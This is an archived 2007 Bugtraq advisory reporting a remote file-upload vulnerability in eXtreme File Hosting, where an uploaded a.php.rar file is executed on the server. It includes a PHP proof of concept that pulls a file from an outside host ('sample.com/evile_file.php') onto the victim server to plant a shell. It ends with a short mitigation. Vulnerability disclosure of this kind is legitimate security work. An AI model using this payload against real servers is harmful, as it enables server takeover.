lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070209090823.23915.qmail@securityfocus.com>
Date: 9 Feb 2007 09:08:23 -0000
From: hamed.bazargani@...il.com
To: bugtraq@...urityfocus.com
Subject: eXtreme File Hosting remote file upload vulnerability

A security bug have been discovered in eXtreme File Hosting, which can be upload the attaker files and can get the shell with phpshell.

bug : in this borgram with php can user upload zip or rar file hacker can upload the a.php.rar file that contain 

###########################
<?php
$file = 'http://sample.com/evile_file.php';
$newfile = 'evile_file.php';
if (!copy($file, $newfile)) {
   echo "failed to copy $file...\n";
}else{
   echo "OK file copy in victim host";
}
?> 
###########################

and upload it the click in download link then this file run and dont download
after run a.php.rar the evile_file.php copy in victim host and attacker can use for hacking server.


Solution:  disable rar file uploading in setting
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
software: eXtreme File Hosting
site: http://www.extremepow.com
Reported By: : hamed bazargani (hamed.bazargani@...il.com) From I.R.IRAN and all iranian whitehat hacker

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ